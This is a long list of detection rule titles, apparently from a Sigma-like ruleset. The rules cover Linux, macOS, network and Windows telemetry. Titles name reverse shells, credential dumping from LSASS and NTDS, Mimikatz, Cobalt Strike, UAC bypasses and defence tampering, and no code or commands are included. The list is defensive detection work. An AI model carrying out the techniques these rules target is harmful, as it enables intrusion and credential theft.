  • Outdated Dependency Or Vulnerability Alert Disabled
  • Github High Risk Configuration Disabled
  • Github Push Protection Disabled
  • Github Secret Scanning Feature Disabled
  • Azure Login Bypassing Conditional Access Policies
  • Disabling Multi Factor Authentication
  • Okta FastPass Phishing Detection
  • Okta New Admin Console Behaviours
  • Potential Okta Password in AlternateID Field
  • Okta Suspicious Activity Reported by End-user
  • Okta User Session Start Via An Anonymising Proxy Service
  • Auditing Configuration Changes on Linux Host
  • Binary Padding - Linux
  • BPFDoor Abnormal Process ID or Lock File Accessed
  • Disable System Firewall
  • Credentials In Files - Linux
  • Linux Keylogging with Pam.d
  • Modification of ld.so.preload
  • Loading of Kernel Module via Insmod
  • Logging Configuration Changes on Linux Host
  • Equation Group Indicators
  • Buffer Overflow Attempts
  • Commands to Clear or Remove the Syslog - Builtin
  • Code Injection by ld.so Preload
  • Nimbuspwn Exploitation
  • Potential Suspicious BPF Activity - Linux
  • Shellshock Expression
  • Privileged User Has Been Created
  • Linux Command History Tampering
  • Suspicious Activity in Shell Commands
  • Suspicious Reverse Shell Command Line
  • JexBoss Command Sequence
  • Symlink Etc Passwd
  • PwnKit Local Privilege Escalation
  • Relevant ClamAV Message
  • Guacamole Two Users Sharing Session Anomaly
  • Suspicious Named Error
  • Triple Cross eBPF Rootkit Default LockFile
  • Triple Cross eBPF Rootkit Default Persistence
  • Communication To Ngrok Tunneling Service - Linux
  • Communication To LocaltoNet Tunneling Service Initiated - Linux
  • Linux Crypto Mining Pool Connections
  • Potentially Suspicious Malware Callback Communication - Linux
  • Suspicious Invocation of Shell via AWK - Linux
  • Capsh Shell Invocation - Linux
  • Commands to Clear or Remove the Syslog
  • Copy Passwd Or Shadow From TMP Path
  • Linux Crypto Mining Indicators
  • Atlassian Confluence CVE-2022-26134
  • Apache Spark Shell Command Injection - ProcessCreation
  • Shell Invocation via Env Command - Linux
  • ESXi Admin Permission Assigned To Account Via ESXCLI
  • Shell Execution via Find - Linux
  • Shell Execution via Flock - Linux
  • Shell Execution GCC - Linux
  • Shell Execution via Git - Linux
  • Potential GobRAT File Discovery Via Grep
  • Potential Netcat Reverse Shell Execution
  • Shell Execution via Nice - Linux
  • Suspicious Nohup Execution
  • OMIGOD SCX RunAsProvider ExecuteScript
  • OMIGOD SCX RunAsProvider ExecuteShellCommand
  • Potential Perl Reverse Shell Execution
  • Potential PHP Reverse Shell
  • Python Reverse Shell Execution Via PTY And Socket Modules
  • Inline Python Execution - Spawn Shell Via OS System Library
  • Shell Execution via Rsync - Linux
  • Suspicious Invocation of Shell via Rsync
  • Shell Invocation Via Ssh - Linux
  • Sudo Privilege Escalation CVE-2019-14287
  • Potentially Suspicious Execution From Tmp Folder
  • History File Deletion
  • Linux HackTool Execution
  • Suspicious Java Children Processes
  • Linux Recon Indicators
  • Shell Execution Of Process Located In Tmp Directory
  • Triple Cross eBPF Rootkit Execve Hijack
  • Triple Cross eBPF Rootkit Install Commands
  • Vim GTFOBin Abuse - Linux
  • Linux Webshell Indicators
  • Binary Padding - MacOS
  • Clipboard Data Collection Via OSAScript
  • Credentials In Files
  • JXA In-memory Execution Via OSAScript
  • Suspicious Microsoft Office Child Process - MacOS
  • OSACompile Run-Only Execution
  • Potential Persistence Via PlistBuddy
  • Potential Base64 Decoded From Images
  • Potential WizardUpdate Malware Infection
  • Cisco Clear Logs
  • Cisco Crypto Commands
  • Cisco Disabling Logging
  • Cisco Local Accounts
  • DNS Query to External Service Interaction Domains
  • Monero Crypto Coin Mining Pool Lookup
  • DNS TXT Answer with Possible Execution Strings
  • Wannacry Killswitch Domain
  • Default Cobalt Strike Certificate
  • OMIGOD HTTP No Authentication RCE
  • Publicly Accessible RDP Service
  • Possible Impacket SecretDump Remote Activity - Zeek
  • First Time Seen Remote Named Pipe - Zeek
  • Suspicious PsExec Execution - Zeek
  • Apache Segmentation Fault
  • Nginx Core Dump
  • Windows WebDAV User Agent
  • HackTool - CobaltStrike Malleable Profile Patterns - Proxy
  • HackTool - Empire UserAgent URI Combo
  • Raw Paste Service Access
  • Flash Player Update from Suspicious Location
  • APT User Agent
  • Bitsadmin to Uncommon IP Server Address
  • Bitsadmin to Uncommon TLD
  • Crypto Miner User Agent
  • Exploit Framework User Agent
  • Hack Tool User Agent
  • Malware User Agent
  • Suspicious User Agent
  • Suspicious External WebDAV Execution
  • Java Payload Strings
  • JNDIExploit Pattern
  • SQL Injection Strings In URI
  • Server Side Template Injection Strings
  • Suspicious Windows Strings In URI
  • Webshell ReGeorg Detection Via Web Logs
  • Windows Webshell Strings
  • Cross Site Scripting Strings
  • Mimikatz Use
  • Microsoft Malware Protection Engine Crash
  • Potential Credential Dumping Via WER - Application
  • Restricted Software Access By SRP
  • Atera Agent Installation
  • MSSQL Add Account To Sysadmin Role
  • MSSQL Disable Audit Settings
  • MSSQL SPProcoption Set
  • MSSQL XPCmdshell Suspicious Execution
  • MSSQL XPCmdshell Option Change
  • Relevant Anti-Virus Signature Keywords In Application Log
  • Microsoft Malware Protection Engine Crash - WER
  • Suspicious Remote AppX Package Locations
  • Suspicious AppX Package Locations
  • BITS Transfer Job Download From File Sharing Domains
  • BITS Transfer Job Download From Direct IP
  • BITS Transfer Job Download To Potential Suspicious Folder
  • CodeIntegrity - Disallowed File For Protected Processes Has Been Blocked
  • CodeIntegrity - Blocked Image/Driver Load For Policy Violation
  • CodeIntegrity - Blocked Driver Load With Revoked Certificate
  • CodeIntegrity - Revoked Kernel Driver Loaded
  • CodeIntegrity - Blocked Image Load With Revoked Certificate
  • CodeIntegrity - Revoked Image Loaded
  • CodeIntegrity - Unsigned Kernel Module Loaded
  • CodeIntegrity - Unsigned Image Loaded
  • CodeIntegrity - Unmet WHQL Requirements For Loaded Kernel Module
  • Loading Diagcab Package From Remote Path
  • DNS Query for Anonfiles.com Domain - DNS Client
  • Query Tor Onion Address - DNS Client
  • DNS Server Error Failed Loading the ServerLevelPluginDLL
  • New Firewall Rule Added In Windows Firewall Exception List For Potential Suspicious Application
  • All Rules Have Been Deleted From The Windows Firewall Configuration
  • HTTP Logging Disabled On IIS Server
  • Remove Exported Mailbox from Exchange Webserver
  • Exchange Set OabVirtualDirectory ExternalUrl Property
  • Failed MSExchange Transport Agent Installation
  • Powerview Add-DomainObjectAcl DCSync AD Extend Right
  • AD Privileged Users or Groups Reconnaissance
  • ADCS Certificate Template Configuration Vulnerability with Risky EKU
  • Enabled User Right in AD to Control User Objects
  • Active Directory User Backdoors
  • Weak Encryption Enabled and Kerberoast
  • Hacktool Ruler
  • Security Eventlog Cleared
  • CobaltStrike Service Installations - Security
  • DCOM InternetExplorer.Application Iertutil DLL Hijack - Security
  • Mimikatz DC Sync
  • Important Windows Event Auditing Disabled
  • ETW Logging Disabled In .NET Processes - Registry
  • DPAPI Domain Backup Key Extraction
  • Persistence and Execution at Scale via GPO Scheduled Task
  • Hidden Local User Creation
  • HackTool - EDRSilencer Execution - Filter Added
  • HackTool - NoFilter Execution
  • HybridConnectionManager Service Installation
  • Impacket PsExec Execution
  • Possible Impacket SecretDump Remote Activity
  • Invoke-Obfuscation CLIP+ Launcher - Security
  • Invoke-Obfuscation Obfuscated IEX Invocation - Security
  • Invoke-Obfuscation STDIN+ Launcher - Security
  • Invoke-Obfuscation VAR+ Launcher - Security
  • Invoke-Obfuscation Via Stdin - Security
  • Invoke-Obfuscation Via Use Clip - Security
  • Invoke-Obfuscation Via Use MSHTA - Security
  • Invoke-Obfuscation Via Use Rundll32 - Security
  • Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - Security
  • First Time Seen Remote Named Pipe
  • Credential Dumping Tools Service Execution - Security
  • Metasploit SMB Authentication
  • Metasploit Or Impacket Service Installation Via SMB PsExec
  • Meterpreter or Cobalt Strike Getsystem Service Installation - Security
  • NetNTLM Downgrade Attack
  • Possible PetitPotam Coerce Authentication Attempt
  • PetitPotam Suspicious Kerberos TGT Request
  • PowerShell Scripts Installed as Services - Security
  • Protected Storage Service Access
  • RDP over Reverse SSH Tunnel WFP
  • Register new Logon Process by Rubeus
  • Remote PowerShell Sessions Network Connections (WinRM)
  • Replay Attack Detected
  • SAM Registry Hive Handle Request
  • Service Installed By Unusual Client - Security
  • SMB Create Remote File Admin Share
  • Password Change on Directory Service Restore Mode (DSRM) Account
  • Kerberos Manipulation
  • Suspicious LDAP-Attributes Used
  • Suspicious Windows ANONYMOUS LOGON Local Account Created
  • Password Dumper Activity on LSASS
  • Reconnaissance Activity
  • Password Protected ZIP File Opened (Suspicious Filenames)
  • Password Protected ZIP File Opened (Email Attachment)
  • Possible Shadow Credentials Added
  • Suspicious PsExec Execution
  • Suspicious Scheduled Task Creation
  • Important Scheduled Task Deleted/Disabled
  • Suspicious Scheduled Task Update
  • SysKey Registry Keys Access
  • Sysmon Channel Reference Deletion
  • Suspicious Teams Application Related ObjectAcess Event
  • User Couldn't Call a Privileged Service 'LsaRegisterLogonProcess'
  • T1047 Wmiprvse Wbemcomn DLL Hijack
  • RDP Login from Localhost
  • Successful Overpass the Hash Attempt
  • Scanner PoC for CVE-2019-0708 RDP RCE Vuln
  • External Remote SMB Logon from Public IP
  • Potential Privilege Escalation via Local Kerberos Relay over LDAP
  • RottenPotato Like Attack Pattern
  • Windows Filtering Platform Blocked Connection From EDR Agent Binary
  • Microsoft Defender Blocked from Loading Unsigned DLL
  • Unsigned Binary Loaded From Suspicious Location
  • HybridConnectionManager Service Running
  • Sysmon Application Crashed
  • DHCP Server Error Failed Loading the CallOut DLL
  • DHCP Server Loaded the CallOut DLL
  • Local Privilege Escalation Indicator TabTip
  • Important Windows Eventlog Cleared
  • KDC RC4-HMAC Downgrade CVE-2022-37966
  • Critical Hive In Suspicious Location Access Bits Cleared
  • Vulnerable Netlogon Secure Channel Connection Allowed
  • NTFS Vulnerability Exploitation
  • smbexec.py Service Installation
  • Invoke-Obfuscation CLIP+ Launcher - System
  • Invoke-Obfuscation Obfuscated IEX Invocation - System
  • Invoke-Obfuscation STDIN+ Launcher - System
  • Invoke-Obfuscation VAR+ Launcher - System
  • Invoke-Obfuscation Via Stdin - System
  • Invoke-Obfuscation Via Use Clip - System
  • Invoke-Obfuscation Via Use MSHTA - System
  • Invoke-Obfuscation Via Use Rundll32 - System
  • Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - System
  • KrbRelayUp Service Installation
  • Credential Dumping Tools Service Execution - System
  • Meterpreter or Cobalt Strike Getsystem Service Installation - System
  • PowerShell Scripts Installed as Services
  • HackTool Service Registration or Execution
  • ProcessHacker Privilege Elevation
  • Sliver C2 Default Service Installation
  • Service Installed By Unusual Client - System
  • Suspicious Service Installation
  • Important Windows Service Terminated With Error
  • Important Windows Service Terminated Unexpectedly
  • RTCore Suspicious Service Installation
  • Service Installation with Suspicious Folder Pattern
  • Suspicious Service Installation Script
  • Important Scheduled Task Deleted
  • Ngrok Usage with Remote Desktop Service
  • Windows Defender Grace Period Expired
  • LSASS Access Detected via Attack Surface Reduction
  • PSExec and WMI Process Creations Block
  • Windows Defender Exploit Guard Tamper
  • Windows Defender Malware And PUA Scanning Disabled
  • Windows Defender AMSI Trigger Detected
  • Windows Defender Real-time Protection Disabled
  • Win Defender Restored Quarantine File
  • Windows Defender Configuration Changes
  • Microsoft Defender Tamper Protection Trigger
  • Windows Defender Threat Detected
  • Windows Defender Virus Scanning Feature Disabled
  • HackTool - CACTUSTORCH Remote Thread Creation
  • HackTool - Potential CobaltStrike Process Injection
  • Remote Thread Created In KeePass.EXE
  • Remote Thread Creation In Mstsc.Exe From Suspicious Location
  • Potential Credential Dumping Attempt Via PowerShell Remote Thread
  • Password Dumper Remote Thread in LSASS
  • Rare Remote Thread Creation By Uncommon Source Image
  • Remote Thread Creation Ttdinject.exe Proxy
  • Suspicious File Download From File Sharing Websites - File Stream
  • HackTool Named File Stream Created
  • Exports Registry Key To an Alternate Data Stream
  • Unusual File Download from Direct IP Address
  • Potential Suspicious Winget Package Installation
  • Potentially Suspicious File Download From ZIP TLD
  • DNS Query for Anonfiles.com Domain - Sysmon
  • DNS HybridConnectionManager Service Bus
  • DNS Query Tor .Onion Address - Sysmon
  • Malicious Driver Load
  • Driver Load From A Temporary Directory
  • PUA - Process Hacker Driver Load
  • Vulnerable HackSys Extreme Vulnerable Driver Load
  • Vulnerable WinRing0 Driver Load
  • WinDivert Driver Load
  • Vulnerable Driver Load
  • File Creation Date Changed to Another Year
  • Unusual File Modification by dns.exe
  • Potential PrintNightmare Exploitation Attempt
  • Exchange PowerShell Cmdlet History Deleted
  • Prefetch File Deleted
  • Unusual File Deletion by Dns.exe
  • Suspicious Binary Writes Via AnyDesk
  • BloodHound Collection Files
  • Creation Exe for Service with Unquoted Path
  • Cred Dump Tools Dropped Files
  • WScript or CScript Dropper - File
  • DLL Search Order Hijackig Via Additional Space in Path
  • Suspicious ASPX File Drop by Exchange
  • HackTool - CrackMapExec File Indicators
  • HackTool - Typical HiveNightmare SAM File Export
  • HackTool - RemoteKrbRelay SMB Relay Secrets Dump Module Indicators
  • HackTool - NPPSpy Hacktool Usage
  • HackTool - Powerup Write Hijack DLL
  • HackTool - Potential Remote Credential Dumping Activity Via CrackMapExec Or Impacket-Secretsdump
  • HackTool - SafetyKatz Dump Indicator
  • Malicious DLL File Dropped in the Teams or OneDrive Folder
  • ISO File Created Within Temp Folders
  • LSASS Process Memory Dump Files
  • LSASS Process Dump Artefact In CrashDumps Folder
  • WerFault LSASS Process Memory Dump
  • Octopus Scanner Malware
  • Adwind RAT / JRAT File Artifact
  • File Creation In Suspicious Directory By Msdt.EXE
  • Uncommon File Creation By Mysql Daemon Process
  • Suspicious DotNET CLR Usage Log Artifact
  • Suspicious File Creation In Uncommon AppData Folder
  • NTDS.DIT Creation By Uncommon Parent Process
  • NTDS.DIT Creation By Uncommon Process
  • NTDS Exfiltration Filename Patterns
  • Potential Persistence Via Microsoft Office Add-In
  • Office Macro File Creation From Suspicious Process
  • Suspicious File Created Via OneNote Application
  • .RDP File Created by Outlook Process
  • PCRE.NET Package Temp Files
  • Suspicious Outlook Macro Created
  • Potential Persistence Via Microsoft Office Startup Folder
  • File With Uncommon Extension Created By An Office Application
  • Uncommon File Created In Office Startup Folder
  • Potential Persistence Via Outlook Form
  • Malicious PowerShell Scripts - FileCreation
  • Potential Startup Shortcut Persistence Via PowerShell.EXE
  • .RDP File Created By Uncommon Application
  • Potential Winnti Dropper Activity
  • PDF File Created By RegEdit.EXE
  • Potential RipZip Attack on Startup Folder
  • Potential SAM Database Dump
  • Windows Shell/Scripting Application File Write to Suspicious Folder
  • Windows Binaries Write Suspicious Extensions
  • Suspicious Creation with Colorcpl
  • Suspicious Desktopimgdownldr Target File
  • Suspicious Creation TXT File in User Desktop
  • DPAPI Backup Keys And Certificate Export Activity IOC
  • Suspicious Double Extension Files
  • Suspicious MSExchangeMailboxReplication ASPX Write
  • Suspicious Executable File Creation
  • Suspicious Get-Variable.exe Creation
  • Legitimate Application Dropped Archive
  • Legitimate Application Dropped Executable
  • Legitimate Application Dropped Script
  • Suspicious File Creation Activity From Fake Recycle.Bin Folder
  • Potential File Extension Spoofing Using Right-to-Left Override
  • Suspicious Startup Folder Persistence
  • Suspicious Scheduled Task Write to System32 Tasks
  • Suspicious Interactive PowerShell as SYSTEM
  • LiveKD Kernel Memory Dump File Created
  • LiveKD Driver Creation By Uncommon Process
  • Process Explorer Driver Creation By Non-Sysinternals Binary
  • PSEXEC Remote Execution File Artefact
  • Potential Privilege Escalation Attempt Via .Exe.Local Technique
  • LSASS Process Memory Dump Creation Via Taskmgr.EXE
  • Hijack Legit RDP Session to Move Laterally
  • UAC Bypass Using Consent and Comctl32 - File
  • UAC Bypass Using .NET Code Profiler on MMC
  • UAC Bypass Using EventVwr
  • UAC Bypass Using IDiagnostic Profile - File
  • UAC Bypass Using IEInstal - File
  • UAC Bypass Using MSConfig Token Modification - File
  • UAC Bypass Using NTFS Reparse Point - File
  • UAC Bypass Abusing Winsat Path Parsing - File
  • UAC Bypass Using Windows Media Player - File
  • Renamed VsCode Code Tunnel Execution - File Indicator
  • WMI Persistence - Script Event Consumer File Write
  • UEFI Persistence Via Wpbbin - FileCreation
  • DLL Loaded From Suspicious Location Via Cmspt.EXE
  • Suspicious Renamed Comsvcs DLL Loaded By Rundll32
  • Suspicious Unsigned Dbghelp/Dbgcore DLL Loaded
  • PCRE.NET Package Image Load
  • Load Of RstrtMgr.DLL By A Suspicious Process
  • Diagnostic Library Sdiageng.DLL Loaded By Msdt.EXE
  • Time Travel Debugging Utility Usage - Image
  • Suspicious Volume Shadow Copy Vssapi.dll Load
  • Suspicious Volume Shadow Copy VSS_PS.dll Load
  • HackTool - SILENTTRINITY Stager DLL Load
  • HackTool - SharpEvtMute DLL Load
  • GAC DLL Loaded Via Office Applications
  • VBA DLL Loaded Via Office Application
  • Abusable DLL Potential Sideloading From Suspicious Location
  • Potential appverifUI.DLL Sideloading
  • Aruba Network Service Potential DLL Sideloading
  • Potential DLL Sideloading Via comctl32.dll
  • Potential EACore.DLL Sideloading
  • Potential Edputil.DLL Sideloading
  • Potential System DLL Sideloading From Non System Locations
  • Potential Iviewers.DLL Sideloading
  • Potential DLL Sideloading Of KeyScramblerIE.DLL Via KeyScrambler.EXE
  • Unsigned Mfdetours.DLL Sideloading
  • Potential DLL Sideloading Of Non-Existent DLLs From System Folders
  • Microsoft Office DLL Sideload
  • Potential Rcdll.DLL Sideloading
  • Potential RjvPlatform.DLL Sideloading From Non-Default Location
  • DLL Sideloading Of ShellChromeAPI.DLL
  • Potential SmadHook.DLL Sideloading
  • Fax Service DLL Search Order Hijack
  • VMMap Unsigned Dbghelp.DLL Potential Sideloading
  • Potential DLL Sideloading Via VMware Xfer
  • Potential Waveedit.DLL Sideloading
  • Potential Mpclient.DLL Sideloading
  • DotNet CLR DLL Loaded By Scripting Applications
  • Suspicious Unsigned Thor Scanner Execution
  • UAC Bypass Using Iscsicpl - ImageLoad
  • UAC Bypass With Fake DLL
  • Wmiprvse Wbemcomn DLL Hijack
  • WMI Persistence - Command Line Event Consumer
  • Network Connection Initiated By AddinUtil.EXE
  • Uncommon Network Connection Initiated By Certutil.EXE
  • Outbound Network Connection Initiated By Cmstp.EXE
  • Outbound Network Connection Initiated By Microsoft Dialer
  • Network Communication With Crypto Mining Pool
  • New Connection Initiated To Potential Dead Drop Resolver Domain
  • Suspicious Dropbox API Usage
  • Communication To LocaltoNet Tunneling Service Initiated
  • Process Initiated Network Connection To Ngrok Domain
  • Communication To Ngrok Tunneling Service Initiated
  • Network Connection Initiated By Eqnedt32.EXE
  • Network Connection Initiated By IMEWDBLD.EXE
  • Network Connection Initiated Via Notepad.EXE
  • Outbound RDP Connections Over Non-Standard Tools
  • RDP Over Reverse SSH Tunnel
  • RDP to HTTP or HTTPS Target Ports
  • Silenttrinity Stager Msbuild Activity
  • Network Connection Initiated From Process Located In Potentially Suspicious Or Uncommon Location
  • Potentially Suspicious Malware Callback Communication
  • Network Communication Initiated To File Sharing Domains From Process Located In Suspicious Folder
  • Potential Remote PowerShell Session Initiated
  • Suspicious Network Connection Binary No CommandLine
  • Outbound Network Connection Initiated By Script Interpreter
  • CobaltStrike Named Pipe Patterns
  • HackTool - CoercedPotato Named Pipe Creation
  • HackTool - EfsPotato Named Pipe Creation
  • Delete Volume Shadow Copies Via WMI With PowerShell
  • PowerShell Called from an Executable Version Mismatch
  • Potential RemoteFXvGPUDisablement.EXE Abuse
  • Tamper Windows Defender - PSClassic
  • Malicious PowerShell Scripts - PoshModule
  • Suspicious Get-ADDBAccount Usage
  • HackTool - Evil-WinRm Execution - PowerShell Module
  • Invoke-Obfuscation CLIP+ Launcher - PowerShell Module
  • Invoke-Obfuscation Obfuscated IEX Invocation - PowerShell Module
  • Invoke-Obfuscation STDIN+ Launcher - PowerShell Module
  • Invoke-Obfuscation VAR+ Launcher - PowerShell Module
  • Invoke-Obfuscation Via Stdin - PowerShell Module
  • Invoke-Obfuscation Via Use MSHTA - PowerShell Module
  • Invoke-Obfuscation Via Use Clip - PowerShell Module
  • Invoke-Obfuscation Via Use Rundll32 - PowerShell Module
  • Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - PowerShell Module
  • Malicious PowerShell Commandlets - PoshModule
  • Potential RemoteFXvGPUDisablement.EXE Abuse - PowerShell Module
  • Remote PowerShell Session (PS Module)
  • Suspicious PowerShell Invocations - Generic - PowerShell Module
  • Suspicious PowerShell Invocations - Specific - PowerShell Module
  • AADInternals PowerShell Cmdlets Execution - PsScript
  • Powershell Add Name Resolution Policy Table Rule
  • PowerShell ADRecon Execution
  • AMSI Bypass Pattern Assembly GetType
  • Clearing Windows Console History
  • Powershell Install a DLL in System Directory
  • Create Volume Shadow Copy with Powershell
  • Disable Powershell Command History
  • Disable-WindowsOptionalFeature Command PowerShell
  • DSInternals Suspicious PowerShell Cmdlets - ScriptBlock
  • Disable of ETW Trace - Powershell
  • HackTool - Rubeus Execution - ScriptBlock
  • HackTool - WinPwn Execution - ScriptBlock
  • Powershell DNSExfiltration
  • Invoke-Obfuscation CLIP+ Launcher - PowerShell
  • Invoke-Obfuscation Obfuscated IEX Invocation - PowerShell
  • Invoke-Obfuscation STDIN+ Launcher - Powershell
  • Invoke-Obfuscation VAR+ Launcher - PowerShell
  • Invoke-Obfuscation Via Stdin - Powershell
  • Invoke-Obfuscation Via Use Clip - Powershell
  • Invoke-Obfuscation Via Use MSHTA - PowerShell
  • Invoke-Obfuscation Via Use Rundll32 - PowerShell
  • Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - PowerShell
  • Malicious PowerShell Commandlets - ScriptBlock
  • Live Memory Dump Using Powershell
  • Malicious Nishang PowerShell Commandlets
  • NTFS Alternate Data Stream
  • Code Executed Via Office Add-in XLL File
  • Potential Invoke-Mimikatz PowerShell Script
  • PowerShell Web Access Installation - PsScript
  • PowerView PowerShell Cmdlets - ScriptBlock
  • PowerShell Credential Prompt
  • PSAsyncShell - Asynchronous TCP Reverse Shell
  • PowerShell PSAttack
  • Potential RemoteFXvGPUDisablement.EXE Abuse - PowerShell ScriptBlock
  • Request A Single Ticket via PowerShell
  • PowerShell Set-Acl On Windows Folder - PsScript
  • PowerShell ShellCode
  • Malicious ShellIntel PowerShell Commandlets
  • Potential Persistence Via Security Descriptors - ScriptBlock
  • PowerShell Get-Process LSASS in ScriptBlock
  • Suspicious PowerShell Invocations - Generic
  • Suspicious PowerShell Invocations - Specific
  • Suspicious Service DACL Modification Via Set-Service Cmdlet - PS
  • Delete Volume Shadow Copies via WMI with PowerShell - PS Script
  • Deletion of Volume Shadow Copies via WMI with PowerShell - PS Script
  • Tamper Windows Defender Remove-MpPreference - ScriptBlockLogging
  • Tamper Windows Defender - ScriptBlockLogging
  • Powershell Token Obfuscation - Powershell
  • Abuse of Service Permissions to Hide Services Via Set-Service - PS
  • Veeam Backup Servers Credential Dumping Script Execution
  • Potential WinAPI Calls Via PowerShell Scripts
  • WMImplant Hack Tool
  • CMSTP Execution Process Access
  • HackTool - CobaltStrike BOF Injection Pattern
  • HackTool - Generic Process Access
  • HackTool - LittleCorporal Generated Maldoc Injection
  • HackTool - HandleKatz Duplicating LSASS Handle
  • Lsass Memory Dump via Comsvcs DLL
  • HackTool - SysmonEnte Execution
  • LSASS Memory Access by Tool With Dump Keyword In Name
  • Credential Dumping Activity By Python Based Tool
  • Remote LSASS Process Access Through Windows Remote Management
  • Suspicious LSASS Access Via MalSecLogon
  • Credential Dumping Attempt Via WerFault
  • LSASS Access From Potentially White-Listed Processes
  • Credential Dumping Attempt Via Svchost
  • Suspicious Svchost Process Access
  • UAC Bypass Using WOW64 Logger DLL Hijack
  • Suspicious AddinUtil.EXE CommandLine Execution
  • Potential Adplus.EXE Abuse
  • Suspicious AgentExecutor PowerShell Execution
  • Suspicious Child Process of AspNetCompiler
  • Potentially Suspicious ASP.NET Compilation Via AspNetCompiler
  • Set Suspicious Files as System Files Using Attrib.EXE
  • Interactive AT Job
  • Audit Policy Tampering Via NT Resource Kit Auditpol
  • Audit Policy Tampering Via Auditpol
  • Boot Configuration Tampering Via Bcdedit.EXE
  • Suspicious Child Process Of BgInfo.EXE
  • Suspicious Download From Direct IP Via Bitsadmin
  • Suspicious Download From File-Sharing Website Via Bitsadmin
  • File With Suspicious Extension Downloaded Via Bitsadmin
  • File Download Via Bitsadmin To A Suspicious Target Folder
  • Potential Data Stealing Via Chromium Headless Debugging
  • File Download with Headless Browser
  • Chromium Browser Headless Execution To Mockbin Like Site
  • Suspicious Chromium Browser Instance Executed With Custom Extension
  • Tor Client/Browser Execution
  • Suspicious Calculator Usage
  • File Download From IP Based URL Via CertOC.EXE
  • Suspicious DLL Loaded via CertOC.EXE
  • Suspicious File Downloaded From Direct IP Via Certutil.EXE
  • Suspicious File Downloaded From File-Sharing Website Via Certutil.EXE
  • Potential NTLM Coercion Via Certutil.EXE
  • Suspicious File Encoded To Base64 Via Certutil.EXE
  • File In Suspicious Location Encoded To Base64 Via Certutil.EXE
  • Process Access via TrolleyExpress Exclusion
  • Potential Reconnaissance For Cached Credentials Via Cmdkey.EXE
  • Change Default File Association To Executable Via Assoc
  • Copy .DMP/.DUMP Files From Remote Share Via Cmd.EXE
  • Curl Download And Execute Combination
  • Potential Privilege Escalation Using Symlink Between Osk and Cmd
  • VolumeShadowCopy Symlink Creation Via Mklink
  • Suspicious File Execution From Internet Hosted WebDav Share
  • Cmd.EXE Missing Space Characters Execution Anomaly
  • Potential CommandLine Path Traversal Via Cmd.EXE
  • NtdllPipe Like Activity Execution
  • Suspicious Ping/Del Command Combination
  • Copy From VolumeShadowCopy Via Cmd.EXE
  • CMSTP Execution Process Creation
  • Conhost.exe CommandLine Path Traversal
  • Control Panel Items
  • CreateDump Process Dump
  • Csc.EXE Execution Form Potentially Suspicious Parent
  • Suspicious Use of CSharp Interactive Console
  • Suspicious File Download From IP Via Curl.EXE
  • Suspicious File Download From File Sharing Domain Via Curl.EXE
  • Suspicious Curl.EXE Download
  • ManageEngine Endpoint Central Dctask64.EXE Potential Abuse
  • Suspicious Desktopimgdownldr Command
  • PowerShell Web Access Feature Enabled Via DISM
  • Dllhost.EXE Execution Anomaly
  • DLL Sideloading by VMware Xfer Utility
  • New DNS ServerLevelPluginDll Installed Via Dnscmd.EXE
  • DNS Exfiltration and Tunneling Tools Execution
  • Unusual Child Process of dns.exe
  • Potential Recon Activity Using DriverQuery.EXE
  • Suspicious Kernel Dump Using Dtrace
  • Potential Windows Defender AV Bypass Via Dump64.EXE Rename
  • Suspicious DumpMinitool Execution
  • Copying Sensitive Files with Credential Data
  • Potentially Suspicious Event Viewer Child Process
  • File Explorer Folder Opened Using Explorer Folder Shortcut Via Shell
  • Explorer NOUACCHECK Flag
  • Findstr GPP Passwords
  • LSASS Process Reconnaissance Via Findstr.EXE
  • Sysmon Discovery Via Default Driver Altitude Using Findstr.EXE
  • Finger.EXE Execution
  • Sysmon Driver Unloaded Via Fltmc.EXE
  • Forfiles.EXE Child Process Masquerading
  • Uncommon FileSystem Load Attempt By Format.com
  • Fsutil Suspicious Invocation
  • Potentially Suspicious GoogleUpdate Child Process
  • File Encryption/Decryption Via Gpg4win From Suspicious Locations
  • File Download Using Notepad++ GUP Utility
  • Suspicious GUP Usage
  • Remote CHM File Download/Execution Via HH.EXE
  • HTML Help HH.EXE Suspicious Child Process
  • Suspicious HH.EXE Execution
  • HackTool - ADCSPwn Execution
  • HackTool - Bloodhound/Sharphound Execution
  • HackTool - Certify Execution
  • HackTool - Certipy Execution
  • Operator Bloopers Cobalt Strike Commands
  • Operator Bloopers Cobalt Strike Modules
  • CobaltStrike Load by Rundll32
  • Potential CobaltStrike Process Patterns
  • HackTool - CoercedPotato Execution
  • HackTool - Covenant PowerShell Launcher
  • HackTool - CrackMapExec Execution
  • HackTool - CrackMapExec Execution Patterns
  • HackTool - CrackMapExec Process Patterns
  • HackTool - CrackMapExec PowerShell Obfuscation
  • HackTool - CreateMiniDump Execution
  • HackTool - EDRSilencer Execution
  • HackTool - Empire PowerShell Launch Parameters
  • Hacktool Execution - PE Metadata
  • HackTool - GMER Rootkit Detector and Remover Execution
  • HackTool - HandleKatz LSASS Dumper Execution
  • HackTool - Hashcat Password Cracker Execution
  • HackTool - Htran/NATBypass Execution
  • HackTool - Hydra Password Bruteforce Execution
  • HackTool - Potential Impacket Lateral Movement Activity
  • HackTool - Impacket Tools Execution
  • Invoke-Obfuscation CLIP+ Launcher
  • Invoke-Obfuscation Obfuscated IEX Invocation
  • Invoke-Obfuscation STDIN+ Launcher
  • Invoke-Obfuscation VAR+ Launcher
  • Invoke-Obfuscation Via Stdin
  • Invoke-Obfuscation Via Use Clip
  • Invoke-Obfuscation Via Use MSHTA
  • Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION
  • HackTool - Koadic Execution
  • HackTool - KrbRelay Execution
  • HackTool - KrbRelayUp Execution
  • HackTool - RemoteKrbRelay Execution
  • HackTool - LocalPotato Execution
  • Potential Meterpreter/CobaltStrike Activity
  • HackTool - Mimikatz Execution
  • HackTool - PCHunter Execution
  • HackTool - Default PowerSploit/Empire Scheduled Task Creation
  • HackTool - PowerTool Execution
  • HackTool - Pypykatz Credentials Dumping Activity
  • HackTool - Quarks PwDump Execution
  • HackTool - RedMimicry Winnti Playbook Execution
  • HackTool - PPID Spoofing SelectMyParent Tool Execution
  • HackTool - SharPersist Execution
  • HackTool - SharpEvtMute Execution
  • HackTool - SharpLdapWhoami Execution
  • HackTool - SharpMove Tool Execution
  • HackTool - SharpView Execution
  • HackTool - SharpWSUS/WSUSpendu Execution
  • HackTool - SharpChisel Execution
  • HackTool - SharpImpersonation Execution
  • HackTool - SharpDPAPI Execution
